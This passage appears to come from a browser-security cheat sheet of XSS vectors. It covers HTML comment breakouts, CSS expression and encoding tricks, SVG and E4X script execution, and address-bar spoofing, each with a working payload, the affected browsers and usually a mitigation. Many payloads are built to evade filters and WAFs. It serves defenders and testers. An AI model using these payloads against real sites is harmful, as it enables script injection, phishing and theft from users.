Make sure an attacker cannot turn a comment injection into a conditional comment by using rectangular brackets such as shown in the example. Comment content should be escaped like regular markup - the delimiting sequence --> is neither sufficient nor necessary to successfully close a comment.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Backslashes as alternative to slashes on Webkit#124test
Safari treats backslashes the same way as slash inside URL attributes. Chrome treats prefix "/\" of URL the same way as "//".
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0
- Chrome 9.0
- Chrome Latest
- Safari 5.0
- Safari Latest
QuickTime events causing JavaScript execution#126test
The below displayed construct enables usage of the more or less unknown QuickTime DOM events. Those contain an underscore - which is rather uncommon for event handlers and thus bypasses many blacklist based filters. The attack only works if both <object> tags are in place - and <object> tag 1 supplys the necessary behavior for object tag two.
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
- Internet Explorer 6.0
- Internet Explorer 10.0
Ending HTML comments with a backtick character#133test
On older versions of the Internet Explorer, a backtick charcater can be utilized to end a HTML comment and inject otherwise commented markup. A HTML filter allowing comments can be bypassed with this trick and allow an attacker to inject arbitrary HTML.
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
Make sure, an attacker cannot inject into HTML comments and consider the string "-->" by far not the only way to end a HTML comment.
- Internet Explorer 6.0
- Internet Explorer 8.0
"<% %>" and "<!-- -->" inside plaintext tags#134test
Structures "<%" и "<!--" allow the IE parser to consider closing tag in plaintext tags such as <textarea>, <comment>, <xmp> and others as a part of the plaintext until it finds the structure "%>" or "-->". The syntax in the tags such as <style>, <script> should be valid taking into account these sections, otherwise throws an exception. So, the second example shows that closing </script> tag will be considered as an operator "less" and the regular expression start. The examples are worked up to IE 9 standards mode. SGML-like comment delimiters is similarly parsed in older versions of Safari.
<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
Encode all opening brakets inside plaintext tags. Escape for the closing tags ("<\/script>") is not sufficient.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Safari 3.0
- Safari 4.0.3
JavaScript execution via <FRAMESET> and onpageshow#146test
The <FRAMESET> element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. Note, that the same behavior is exposed by the <BODY> tag as well.
<frameset onpageshow="alert(1)"> <body onpageshow="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <APPLET> with error events#149test
The <APPLET> element fires an "onerror" event without user interaction on Internet Explorer and Edge. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is meanwhile rather uncommon and unknown.
<applet onerror="alert(1)"></applet>
Be sure to work with whitelists when allowing users to submit markup - else legacy tags like <APPLET> might be forgotten to filter and escape.
- Internet Explorer 11.0
- Internet Explorer Latest
Cascading stylesheet injection based vectors
Opera link-source JavaScript execution via CSS#9test
Opera allows setting link sources for arbitrary HTML elements - making them clickable and execute JavaScript. Note that Opera 11.0-11.01 requires an actual <a> tag to have this work - while earlier versions work with other tags too. For later versions still available a data URI.
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
- Opera 8.0
- Opera 12.0 (Limited)
Opera whole-page click hijacking via CSS#27test
Opera as well as other browsers allow to break out attribute selectors and other CSS constructs with {...} - opening the possibility for declaring new properties and assigning values - such as -o-link and -o-link-source. In this case those proprietary properties allow overlaying any selected element with a JavaScript URI link href. Note that as of Opera 11 -o-link only applies for <a> tags. On IE selector is broken up to IE 7 standards mode.
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
In case users are allowed to submit CSS make sure the properties allowed are whitelisted and attribute selector content does not allow the combination {...} because it breaks out the attribute selector and allows declaration of new properties.
- Opera 8.X
- Opera 11.64
JavaScript execution via <LINK> href attribute and data URI#29test
Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <LINK> tag. The example works up to IE 7 standards mode.
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
Make sure stylesheet URIs cannot be controlled by the user - and user submitted <LINK> tags will not be displayed unfiltered.
- Internet Explorer 8.0
- Internet Explorer 10.0
JavaScript execution via <STYLE> @import and data URI#30test
Despite the existing documentation Internet Explorer 8 supports data URIs not only for displaying images but also supplying stylesheet information. This can be used to wrap expression() CSS into a data URI and execute JavaScript with a <STYLE> @import directive. The example works up to IE 7 standards mode.
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
Make sure stylesheet URIs cannot be controlled by the user - and user submitted <STYLE> cannot contain the @import directive.
- Internet Explorer 8.0
- Internet Explorer 10.0
Breaking pointer-events:none with nested links#33test
Firefox 3.6+ allows using CSS "pointer-events" with value "none" to make sure an element will not react on any mouse/pointer based event. This feature enables for example placing a DIV over another DIV without blocking the click events addressed to the underlying DIV.
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
The feature breaks as soon as <A> elements are being used in combination with "pointer-events:none" - containing other <A> elements. <A> elements should not be used for pointer-event logic at all - especially not when containing user controlled HTML.
- Firefox 3.6
- Firefox Latest
- Safari 5.0
- Safari Latest
- Chrome 7.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
- Opera 10.0
- Opera Latest
Opera @import based XSS inside attribute selectors#44test
Opera 10 and later version including latest Opera 10.5 allow breaking out an attribute selector with {} and use @import declarations afterwards. The MIME type for the imported file does not matter - also it can be loaded from arbitrary domains. The imported file contains CSS code to apply a JavaScript URI to all elements on the page to hijack any incoming click.
<style>*[{}@import'test.css?]{color: green;}</style>X
Make sure in user submitted CSS the contents of attribute selectors are properly escaped with backslashes. Also make sure to use a CSS property:value whitelist to forbid properties like -o-link and -o-link-source.
* {-o-link:'javascript:alert(1)';-o-link-source: current;}crossdomain: 1path: http://html5sec.org/test.cssname: test.css
- Opera 8.0
- Opera 11.64
CSS-string breaking#45test
Opera, Firefox and other browsers allow breaking out an css-string with newline symbols. A string cannot directly contain a newline in CSS2+. [a] Characters*, accepted as CCS-strings breakers: Firefox, Internet Explorer (IE8+ standards mode), Opera, Google Chrome, Safari: 10,12,13 Opera 11.01↓, Google Chrome 16↓, Safari: 1-8,11,14-31,127 Opera 11.01↓: 0 * Characters are given as decimal ASCII table index.
<div style="font-family:'foo[a];color:red;';">XXX</div>
- Opera 8.0
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
- Internet Explorer 8.0
- Internet Explorer Latest
Alternative CSS syntax in Internet Explorer#46test
Internet Explorer allows to use right curly brace (}) as a group separator (up to IE 7 standards mode). A CSS declaration in quirks mode (IE 5 standards mode) may consist of a property name, followed by a symbol of equality (=).
<div style="font-family:foo}color=red;">XXX</div>
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Obfuscation css-properties and values via ignored extra characters#60test
[a] Extra characters* ignored before property names (excluding backslash (92) and null character (0)) Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Firefox, Internet Explorer**, Opera: 123*** Firefox 3.x, Internet Explorer**: 8 Internet Explorer**: 1-7,11,14-31,33,35-38,40-44,46-47,58,60-64,91,93-96,124-127,160,8192-8203,12288,65279 Internet Explorer**: CSS-strings [b] Extra characters ignored between property names and colon. Firefox, Internet Explorer (any modes), Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer**: 11 Internet Explorer (quirks mode): 1-8,14-31,33,35-38,40-44,46-47,60,62-64,91,93,94,96,123,124,126,127 Internet Explorer (quirks mode): CSS-strings, alnum sequences after non-alnum characters (color,foo:red) [c] Extra characters ignored before values Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer: 0,11,160,8192-8203,12288,65279 * These are given in decimal codes. ** Up to IE 7 standards mode. *** Ignored only before first property names.
<div style="[a]color[b]:[c]red">XXX</div>
- Firefox 2.X
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
CSS encoding and escaping#61test
[a] Encoding. There are only three tricks to encode characters. [1] You can change the number of zeros: \0A -> \00000A [2] You can change the capital letter: \0A -> \0a [3] You can change the whitespace* accepted as delimiters after the encoded character. Firefox, Google Chrome, Internet Explorer, Opera, Safari: 9,10,12,13,32 Internet Explorer (IE7↓ Standards mode): 11,160,8192-8203,12288,65279 Properties in IE7↓ Standards mode may contain encoded null-character (\0). On Opera and in IE8+ Standards mode encoded null-character cuts off the right side of a CSS structure. The volume of possible encoding is different in the browsers. For example, FF can not encode parentheses, which is part of the functional notation. [b] Escaping. In addition, you can put a backslash before the character. Option of writing a null-character in Internet Explorer 7↓ Standards mode is escaping of any whitespace-character accepted as delimiters: col\ or:red In IE quirks mode inside the url() function a backslash can be treated as equivalent of a slash and thus will not have the escape role. Of course, these methods can be combined with other encoding and obfuscation (for example, change case of original characters). * These are given in decimal codes.
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
- Firefox 1.5
- Firefox Latest
- Opera 8.0
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Chrome 7.0
- Chrome Latest
- Safari 4.0
- Safari Latest
Slash-tags accepting style attributes#71test
A slash-tag can still contain style attributes on IE as the example shows. For extra obfuscation a bogus CSS property is being used to execute the JavaScript via expression() combined with CSS escapes. This example works up to IE 7 standards mode.
<// style=x:expression\28write(1)\29>
Make sure the HTML filter you use deals with slash-tags and doesn't consider them to be plain text. Also be aware of CSS escapes and how they can completely obfuscate any style info inside <STYLE> tags and "style" attributes.
- Internet Explorer 6.0
- Internet Explorer 10.0
IE6 and halfwidth/fullwidth Unicode characters#80test
This example shows how halfwidth/fullwidth Unicode characters can be used on IE6 to substitute characters from the ASCII range. Note that those characters have been used in the example to create the term "expression".
<style>*{x:expression(write(1))}</style>
In case your website still has a lot of IE6 users make sure that the range of halfwidth and fullwidth form characters (U+FF00-FFEF) cannot be used in user submitted markup and styles.
- Internet Explorer 6.0
SVG images containing XML data - with disabled JavaScript#90test
Opera supports the CSS property "content" for style attributes. The SVG image can contain SVG as well as HTML code. The example for Opera 10.x shows how a <FORM> tag can be used to trick the user into clicking a button and thus executing JavaScript. Example for Opera 12.x shows one of the problems (along with a client side DoS, running the "onblur" event, etc), which is generated because of the possibility to steal a focus via embeded SVG image. The same works of course for SVG files embedded via <IMG> tags.
<!-- Up to Opera 10.63 --> <div style=content:url(test2.svg)></div> <!-- Up to Opera 11.64 - see link below --> <!-- Up to Opera 12.x --> <div style="background:url(test5.svg)">PRESS ENTER</div>
<form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)"> <!-- this file can be crossdomain if "action" attribute refers to an external file --> <meta http-equiv="refresh" content="1;URL=test5.svg"/> <input type="submit" autofocus="autofocus"/> </form>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/test5.svgname: test5.svg
- Opera 10.X
- Opera 12.0
Breaking the functional notation on IE (1)#92test
To break the functional notation on IE "url()" can be used combined with a following whitespace - then followed by any non-whitespace character. The following characters* are whitespaces: IE 6,7 standards mode: 9-13,32,160,8192-8203,12288,65279 IE 8 standards mode: 1-32,127 * These are given in decimal codes.
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Multiple CSS "url()" values in IE 6#93test
Internet Explorer supports multiple "url()" values all of which can contain payload. The delimiter between the "url()" values should be a whitespace character ("\x20" in the given example).
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
Make sure in case the user is allowed to submit CSS it is being filtered and whitelisted correctly to avoid attacks via multiple backgrounds.
- Internet Explorer 6.0
Style injection when copying innerHTML (3)#98test
The example shows that Internet Explorer and Mozilla Firefox automaticaly decode CSS-encoding if the harmless markup is copied using innerHTML.
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Firefox 2.X
- Firefox 3.6.28
Using comments to obfuscate styles#99test
As noted in CSS2.1 specification (and repeated in CSS3), comments may occur anywhere outside other tokens. The cases that are exceptions to this rule are a subject to special attention. First of all the CSS2.1 specification is inconsistent, since, for example, the "!important" token in his definition allows comments. Despite the exclusion this feature in CSS3, IE (8-9 standards mode) and Firefox 13 still support "!/**/important". You can find more obvious mistakes, for example, the same Firefox 13 allows "font-family: Ar/**/ial". Special interest are exceptions to this rule in IE. The first example shows the possibility for comments in the value of the property. The third example, in addition to demonstrating a similar possibility inside the "url()" function, is also an interesting case, when a comment can not be replaced by any other structure (another space or encoded space "\000020" will not give necessary effect). Typically these cases occur when the token does not match your precise definition. In this example token "url" can not contain a space character. Inside the <STYLE> tag, there are rules for parsing the SGML comment delimiters, that are allowed before and after statements regardless of the form (opening/closing) and nesting.
XXX<style> *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ <!-- --><!--*{color:red} /* all UA */ *{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ </style>
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 3.X
- Firefox Latest
- Opera 9.X
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Safari 3.0
- Safari Latest
Breaking the functional notation on Chrome and Safari (2)#111test
To break the functional notation "url()" can be used in combination with the following characters*: [a] 1-8,10-31,127,9,32,40 Note that simultaneous breaking of functional notation and strings can be accomplished by the characters listed in #45. * Characters are given as decimal ASCII table index.
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
Breaking the functional notation on IE (3)#112test
If any* part of the CSS-declaration (property or value) contains a left curly brace ({ - not as part of a string), the CSS declaration cannot be closed without using a matching right curly brace (}). In most browsers this feature can not be used to bypass filters - as they require to close the strings, functions and attributes inside blocks. IE nevertheless does not require to close function inside such blocks. It is important to take into account especially when filtered styles are inside the targeted tag's attribute. The example works up to IE 7 standards mode. *There's another exception for IE (see the letters [a] and [b] of #60).
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Jump into the selector via attribute delimiters#113test
According to established practice selectors are usually filtered less thoroughly by filtering software than other parts of CSS language constructs. This example shows how to leave a CSS-block open to get hands on a selector and inject code into a possibly less thoroughly filtered area. On IE this example works in IE 8-9 standards mode.
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
- Firefox 2.X
- Firefox Latest
- Opera 9.X
- Opera 12.0
- Internet Explorer 8.0
- Internet Explorer Latest (In Older Docmodes)
Breaking the functional notation on Chrome and Safari (4)#114test
The functional notation breaker shown in #111 also works with quoted strings for several CSS properties. The following characters can be used to break the string and create a new property-value pair: [a] Safari, Chrome 16↓: 1-8,10-31 and 127 Chrome 17↑: 10,12,13 (decimal ASCII table index)
<x style="background:url('x[a];color:red;/*')">XXX</x>
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- Opera 15.0
- Opera Latest
Plain JavaScript vectors
Firefox setter based JavaScript execution#6test
Using setters on Gecko/Firefox to execute JavaScript without parenthesis
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
- Firefox 1.X
- Firefox 3.6.28
JavaScript execution via sharp variables#15test
This vector demonstrates how sharp variables and cyclic references can be used for obfuscation to hide the actual method execution.
<script>({0:#0=alert/#0#/#0#(0)})</script>
- Firefox 2.X
- Firefox 11.0
JavaScript execution via overwritten ReferenceError object#20test
This JavaScript vector shows how overwriting the ReferenceError object and causing the exact same kind of error afterwards can lead to JavaScript execution. This is of course the same for most other error objects and should be taken into consideration when implementing JavaScript sandboxes or comparable.
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
Do not trust the DOM in case the user can influence it via script injections, includes or other DOM based property access.
- Opera 8.X
- Opera 11.01
- Firefox 1.X
- Firefox 15.0
- Chrome 3.0
- Chrome 9.0
- Safari 4.0
- Safari 5.1.7
JavaScript execution via proprietary __noSuchMethod__#21test
Firefox supports the non-standard __noSuchMethod__ property which will be used as an interceptor as soon as a non existing object method is being called. It can be assigned with the Function object to force JavaScript execution without using function(){...}.
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
- Firefox 3.5
- Firefox Latest
Spoofing the address bar information with history.replaceState()#103test
The history.pushState() and history.replaceState() API allows to create and modify the user's history. An attacker can use this feature to change the information displayed in the address bar as well as the location DOM object and thus initiate phishing attacks or obfuscate bad intentions. While pushState adds a new history entry, replaceState modifies the current one. This removes nearly all traces of the actual location from the browsing history giving no possibility to navigate back. The information shown in the address bar cannot be trusted anymore as soon as an attacker or a malicious website execute JavaScript.
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
- Firefox 4.0
- Firefox Latest
- Chrome 6.0
- Chrome Latest
- Safari 5.0
- Safari Latest
- Opera 11.50
- Opera Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Executing JavaScript using ES6 Template Strings#140test
ES6 specifies a new language feature called "Template Strings" (often also referred to as "Quasi Literals" alongside multi-line strings and others). This allows to execute arbitrary JavaScript code without using parenthesis but back-ticks instead. Inside back-tick delimited strings, placeholders such as ${} can wrap executable code.
<script> alert`1`; var something = `abc${alert(1)}def`; ``.constructor.constructor`alert\`1\````; </script>
Make sure that your IDS, filter and other protective systems are aware of the fact, that back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript. Further make sure, that symbols such as ${} cannot be injected into existing template and multi-line strings.
- Firefox 34.0
- Firefox Latest
E4X vectors working on gecko based browsers
Self-including E4X-based JavaScript snippet#25test
This <SCRIPT> tag tries to include the very same page it is being executed from - and then executes the {}-delimited E4X payload. To avoid having Firefox throw an error during inclusion the ending sequence ;0 is necessary.
<script src="#">{alert(1)}</script>;1
E4X is extremely dangerous since any page can include sources providing valid XML and the mentioned semi-colon delimiter. For effective protection websites must be applied with a DOCTYPE - or contain invalid markup. There are many variations for the ending delimiter - as long it is valid JavaScript and not indicating the page is XML only it will work (;1, ,1, ._, etc..)
- Firefox 1.5
- Firefox 16.0
E4X-based UTF-7 JavaScript/HTML snippet stealing cross-domain markup#26test
In case an attacker can inject the character sequence beginning with .toXMLString() it's possible to include the victimized website in a <SCRIPT> tag loaded from an arbitrary page and steal the markup of the included page - across domain and protocol borders. Note that the whole vector is encoded in UTF-7. This is possible since the including <SCRIPT> tag can decide via charset attribute what charset to use.
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
Make sure all sites are being applied with a defined charset like UTF-8. Also incoming data should be converted from UTF-7 before being escaped with htmlentities() or comparable methods. All websites containing sensitive data should be applied with a DOCTYPE.
- Firefox 1.5
- Firefox 4.0.1
E4X used to close an opening <SCRIPT> tag and create an E4X object at the same time#58test
This one is tricky. Firefox allows to end an opening <SCRIPT> tag with a new E4X object (<b/>) - already being created in the JavaScript scope at the same time. The alert can happen due to the fact that the additional < introduces a size comparison (<b/> < alert(1)).
<b><script<b></b><alert(1)</script </b></b>
- Firefox 1.5
- Firefox 3.6.28
E4X used to close an opening <SCRIPT> tag and {} evaluation#75test
In this example an E4X object is being used to close a half-open <SCRIPT> tag and evaluate code in the global scope afterwards via the E4X curly bracket delimiters. This technique will not work anymore as soon Firefox uses the already integrated HTML5 parser (html5.enable=true)
<script<{alert(1)}/></script </>
- Firefox 1.5
- Firefox 3.6.28
Vectors attacking DOM properties and methods
Self-including DOM Worker XSS#4test
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
- Firefox 3.5
- Firefox 15.0
JSON based vectors
Self-hijacking JSON literals#54test
In case parts of a JSON literal are controlled by user input there's a risk to allow auto-harvesting values from later object members.
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
- Opera 10.0
- Opera 10.10
- Chrome 4.0
- Chrome 6.0
- Firefox 1.X
- Firefox 3.0.19
Vectors embedded in SVG files
SVG executing JavaScript via <G> tag and onload attribute#11test
SVG files can execute JavaScript via onload events on any element without user interaction
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements
- Opera 10.0
- Opera 12.0
- Chrome 4.0
- Chrome 35.0
- Firefox 3.0
- Firefox 3.6.28
- Safari 5.0
- Safari 5.1.7
- Internet Explorer 9.0
- Internet Explorer Latest
Opera 10 SVG font XSS#43test
Opera 10.00 and later minor versions allow using SVG fonts and will - as soon as the font file has loaded even execute embedded JavaScript. The current example utilizes a load event handler to execute the JavaScript without user interaction as soon as the font file has been fully loaded.
<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";} </style> </head> <body>Hello</body> </html>
<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>required_mime: image/svg+xmlcrossdomain: 0path: http://html5sec.org/font.svgname: font.svg
- Opera 10.0
SVG file executing JavaScript via <SCRIPT> tag#47test
SVG files can force the user agent to execute JavaScript via plain <SCRIPT> tags inside any SVG element without user interaction
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
SVG files should not be treated as images - especially when coming to uploads. An SVG file can contain arbitrary HTML data as well as event handlers in native elements
- Opera 10.X
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Firefox 3.X
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Safari 5.0
- Safari Latest
SVG element allows automatic execution of onload attribute without other SVG elements.#65test
SVG tags allow code to be executed with onload without any other elements. This makes for a very short and effective XSS vector, useful in many situations.
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
Not really a bug to fix, this is desired behaviour and only increases XSS scope.
- Chrome 4.0
- Chrome Latest
- Safari 3.4
- Safari Latest
- Firefox 2.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
SVG simple passive JavaScript execution via XLink#87test
Browsers that support SVG, forced to support XLink. The parameter of the attribute "xlink:actuate" for <a> tag is fixed - "onRequest".
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a> </svg>
- Chrome 4.0
- Chrome Latest
- Safari 3.4
- Safari Latest
- Firefox 3.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
SVG active JavaScript execution via XLink in Opera#88test
The content of the xml-links will be automatically included in the current document. The combination of "onLoad" (value of xlink:actuate) and "embed" (value of xlink:show) forms of potentially unsafe SVG-elements.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:alert(1)"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:alert(1)"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/> </svg>
- Opera 9.X
- Opera 12.0
SVG event handler injection via "set" and "animate"#89test
Google Chrome and Safari support binding an event handler using the elements <set> or <animate>. The attribute value is the actually bound event while the "to" attribute value holds the payload. The problem has been fixed in recent Chrome versions.
<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> <animate attributeName="onunload" to="alert(1)"/> </svg>
- Chrome 4.0
- Chrome 10.0
- Safari 3.4
- Safari 4.0.3
Using SVG element <handler>#94test
Specification SVG Tiny 1.2 provides an element <handler>, which is a "bridge" between SVG and XML-events. This element can contain regular JavaScript.
<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler> </svg>
- Opera 10.0
- Opera 12.0
Using SVG element <feImage> and animated data URIs#95test
SVG allows using filter effects to be applied on arbitrary visible SVG elements. The feImage filter allows inclusion of other files - as well as data URIs. With a maliciuosly crafted data URI it's possible to execute JavaScript without user interaction. List all of the elements which can be animated can be found in the specified documentation.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <feImage> <set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/> </feImage> </svg>
Make sure that user submitted SVG data and SVG files are treated as XML documents - not as images. The nature of SVG allows to include almost arbitrary XML data including JavaScript leading to XSS or worse.
- Opera 10.0
- Opera 12.0
Executing JavaScript in SVG Tiny 1.2 without user interaction#104test
Opera - providing advanced support for SVG Tiny 1.2 targeting mobile devices - allows to execute JavaScript without user interaction via arbitrary tags. The tag is being applied with a handler pointing to a data URI containing the actual handler. Important is the hash at the end of the data URI to identify the corrrect handler. It is also possible to refer to an element contained in the SVG by its ID or an external resource.
<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
- Opera 10.X
- Opera 12.0
SVG payload obfuscation with gzipped HTML and MIME type image/svg-xml#105test
Opera allows displaying compressed SVG images without the usually necessary encoding header. This works for almost arbitrary data as long as the content type image/svg+xml is set - or image/svg-xml like in this example. Notice that the compressed data can be truncated. Opera will still accept it and render the <script> tag and execute the alert(1) - most other Gzip parsers will break though - rendering any WAF or similar tool trying to analyze the payload useless (gzip 1.3.12 states the payload contains 50+ MB of binary gibberish). The example contains no actual SVG code - just a regular <script> tag with a XHTML namespace attribute.
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
- Opera 10.X
- Opera 12.0
Passive SVG JavaScript execution via style injection (1)#109test
SVG supports several new CSS properties (clip-path, fill, filter, marker, marker-end, marker-mid, marker-start, mask, stroke), which can refer to external SVG-resources. These properties can also act as separate attributes. Within the external SVG can contain information to animate the current SVG-document. Example shows an animation links, but the possibilities of animation and other elements. Note that Opera does not show the user the change of links address, if the cursor does not go beyond it.
<svg xmlns="http://www.w3.org/2000/svg"> <a id="x"><rect fill="white" width="1000" height="1000"/></a> <rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" /> </linearGradient> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test3.svgname: test3.svg
- Opera 10.X
- Opera 12.0
Passive SVG JavaScript execution via style injection (2)#110test
